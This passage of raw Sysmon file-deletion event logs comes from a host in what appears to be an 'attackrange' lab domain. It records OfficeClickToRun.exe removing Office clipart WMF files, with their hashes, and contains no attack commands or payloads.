Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0197979.WMFMD5=84ED5BA7DA5AB3E5E1A040583BFEA8B3,SHA256=003264074FD3830A5B9147B0642B8B088328FAC9441A8D275BF89D510940012E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065932Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196364.WMFMD5=28A892D37258111108F32099070C9845,SHA256=6D9C35F8CAA3FF43CD7C99BC04D21C934000048DDADA4EA721628472F1A5E510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065931Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196358.WMFMD5=FC844A0D2C5C2921987130924515A9DF,SHA256=69AB7FBEBC0B42A4DB1172A102832FE20A939E22ED9D01188CEE96295F64B5B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065930Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196354.WMFMD5=55305BD89EADAB3283F6121D8613E3BA,SHA256=215060C337061820F692B785568D553ADCAA9B0384D98C592015E3D4355DC09D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065929Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196142.WMFMD5=02DACFC289F81DA05F02C2397C9637AA,SHA256=1C818B117F4C63A719285AB8A154A79F2DAECE2584958A212BC45C06653E4080,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065928Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196110.WMFMD5=7B22BA9BCB4EAFDD8A314C02144D9DED,SHA256=F1CBF6D3087616A4D2E5269146623D89C31E71717577709C0F42CE9C7388D636,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065927Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0196060.WMFMD5=A4A06FC8E72CE3B97788E250F8CA290B,SHA256=1B5A9762852BE9325D6C50370332527E2C2C21298C21686348E1B37AE83AA9DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195788.WMFMD5=076499C120C209258793DD3858443A09,SHA256=C644B3512E30C30B606DBF574F1E27F625242A24E52D0B66472DAC6247F754C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195772.WMFMD5=383E69433ED7D61BDA2628F9AD3FE4D5,SHA256=3795485100AEEE108F898FAA1B521D622935FAA6CB0C1D76E64D2BE0CFDD313F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195428.WMFMD5=29BE3074314A3CF22CB875BBA9560690,SHA256=9D12FBC0F1EFF23B8A0B9187041A2DE2C86F4BC90D5F17CAB7B5D65E455ADBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195342.WMFMD5=79401126299C351B5C92F21A2915C9FF,SHA256=F68AAEB203BC3783DFC0EBCA5EE4D2B0BF283347DE6468DF1A9C9194147DF65E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195320.WMFMD5=1DB6E9A372D683344482A9CB8686E745,SHA256=66B5437457C6457CEB53A73A9C246012707F05A98879ABD9D5449C4B7ED09030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195260.WMFMD5=EDABFAA442C6FA66C67A3D4705E64B90,SHA256=E3EED49F8E03CA5DB39DDF7BB349857BDA123B6F20C1D381E0D3C84B42BF3A8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195254.WMFMD5=E1072F5DE99A26FE403904F5FD059B3B,SHA256=1A1F166233B94D65FD27A952174D37711A6E1DD9D983D0F0FDEF8D5B23FA8275,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.142{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0195248.WMFMD5=FA16450D8D411E2B411E17E579189A36,SHA256=6A67ACEF5345218A20F0A3692DD4F385A1D7D25F0BDE283388420615BFE604A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188679.WMFMD5=EAC23E8151C926D2695147280EF5E54F,SHA256=CFE5D1E5686F539EBA2DA46B45EFA2F911911F656741D0C8EC1E055AE6599563,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188669.WMFMD5=A06306EC5BFC46BCFAD98FF7AADA990F,SHA256=4C9ED49CF9EEAC3045DE9C05B0DB8180166DC3CFE32F1580C2989DDC84E2E2A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188667.WMFMD5=9DB8FFBCB39BBDE6986A614C4B8E19EB,SHA256=6A29732559FEA3E027A07E6FF751F47C40F02B9B821F92C8EF0E1DD837F46F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188587.WMFMD5=8997324715B80B495EFF6EF8A20E04ED,SHA256=7E9C3CAE3190892E467043C2CCC6355FA3002AE98B1253E5859D8B2873D3B0DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188519.WMFMD5=5D733F97CBF6A4098146A4E89CA85409,SHA256=3CE8272ADBCDE1C40E603DB566B18241E73909C155317184C0C6E55753B56570,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188513.WMFMD5=BAD1608FF90D856B8763347AF3B02685,SHA256=5A851681FB44CED48806A58A44386FF6DBC32DFCABF64560DB2941491E0CE924,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0188511.WMFMD5=52C49BA961AE10AA616976CC5A1ADA1D,SHA256=1C4780EF5A633F3A472E0AA4C201A8DA71012E0BAB980D141580B7FC9A37B5C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187921.WMFMD5=F70C28C8E51D3FBC4E4BCF4E8A24B9BD,SHA256=E01EADD5664B33F331CF353013D88F7CA4B2E1BA806A129381E60E1A93ABBB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187895.WMFMD5=0A1E932E8E47D77D3E756577E50B97CB,SHA256=D6D28FFAA0162E32E356B6E53396FD43721DC71199DCD5D91407926C98028D8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065909Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187893.WMFMD5=BEEDA9F9C1A8E909E036929DCAE842B5,SHA256=20E3052C3DEEAE61A5C0DA99B649514186508DD24D861F1D2CA5EBB779E532BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065908Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187883.WMFMD5=9A695EEF209E65F72A065AD17E35EFB9,SHA256=DFCFECD2AC5564829847ABCF417EA62A0E5AE16A0153E9FF5AB6B88737FBD2AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065907Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187881.WMFMD5=52E76941DDFFC26140C016C2D497ADB4,SHA256=FE47C1C7EFF2D3910EB103E107632E2F5BCE2F4A3CF1E447162E46A03419E278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065906Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187863.WMFMD5=3122D78C3D11D93391155B3C9203D3E6,SHA256=66975CB0BDCEF8DBB3D64EA648421220ABE433340185A89B54EB2F9C7E42AEE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065905Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187861.WMFMD5=5A561BC5853920794F7E617ADA734A19,SHA256=4FD5008235A2411E2AE613CEA71F95BBDBCB42B3CF875C42B5D6CC89505775E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187859.WMFMD5=1C04072854ECD830D620810C247AA5D5,SHA256=95DACBB6E6FDE774D8A57DF7D376A937CAD107F3D8521AFA3A743CBD7E4725B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.127{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187851.WMFMD5=A22B5DCA2F63DAD2764D38A8C352A900,SHA256=2C7E0E500F457479364975182E77CEF5F7D2F67A7F2624198866F0EB536E23D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187849.WMFMD5=B93C451829C449A923DD75335BCF77D0,SHA256=6E5783C3C139161BB857EC4D529395B74199B39C03D36E550836CF1930C35466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187847.WMFMD5=E38C5FA9D606E6272B2B5EDAB69BAC38,SHA256=705E5ACA3442147A01346DA8D5F97122787AB103BE4383BE6C6E6CBF463BD2AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187839.WMFMD5=CC3EBB889B6DF6EC4F4267BA71DC2E42,SHA256=C4DE0F708B356756C650BE62B266C4EC79739BB5F9964735B41B24DAC9430FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187837.WMFMD5=D57C37E77F05881E1DD5734BA489A6A1,SHA256=43E473FBEF4EA7C54A03C0CCAF783540B5CE5A9D5A9B011CECB689162C7A7BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187835.WMFMD5=6EA2130480C4F5BAB8F440C557699C01,SHA256=BBD14143A0C4AB131721779D78A33D1A79FE0B251B18953866B0AF889BABF8F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187829.WMFMD5=A2D8A9450CC687D6B1169C4B972A9115,SHA256=B2A033E9AA9CC5F033620AF83CECD5D2DA1C262D08C220BAA08A0BAF787A3A5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187825.WMFMD5=04B180A452204D2C1A3890453DF30EC6,SHA256=06DF0891F2423A8559533C9DA64640DDD03BC202D498903D8A54BE7140D857B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187819.WMFMD5=DFB03E6DE3789983AB468FBA641AD87D,SHA256=D18420108EE941C4CC5F656916179E33B8DCCCE8970AB105231B3E118C8D5AA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187817.WMFMD5=1B23A97A99F52500083F9671B1DBB82C,SHA256=CC3511A6C31B2B0E17EA48F1FC1B8AA704F98573C0746DF8EC1594098EF708AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187815.WMFMD5=B6DAE1CC058759007CE449AE8EC4519F,SHA256=20D2808F8E5616A1072799ABAA5A85B069A13DDDA796455E9D82B30702EE7B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0187647.WMFMD5=96A936BEB8C96C4C828CE1B3B749C2A7,SHA256=5074C80A9FCAC26D58DBCCB6B15EBEF422E456523A6225CE149688F4DE2D09ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0186364.WMFMD5=C6173FBBEEFFA91112777716339D6D9A,SHA256=09DC38FA2E2CC4A3FC2081F1FA741AAA51811B21441E612BDB7ED5A0464C2B0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0186362.WMFMD5=5B752FF5D42CF71BEE188C4706F34A74,SHA256=8E0DB221ACE7785652D322D5D79AA921616B6801DB71F52AA55A13D6D3631AED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0186360.WMFMD5=6AC32842DF47EDF1BAA3274F84191628,SHA256=58B3FDBD440605DE9CAE4829163ACB2E367DF377288FE9DFE1D4794799E0DB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.111{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 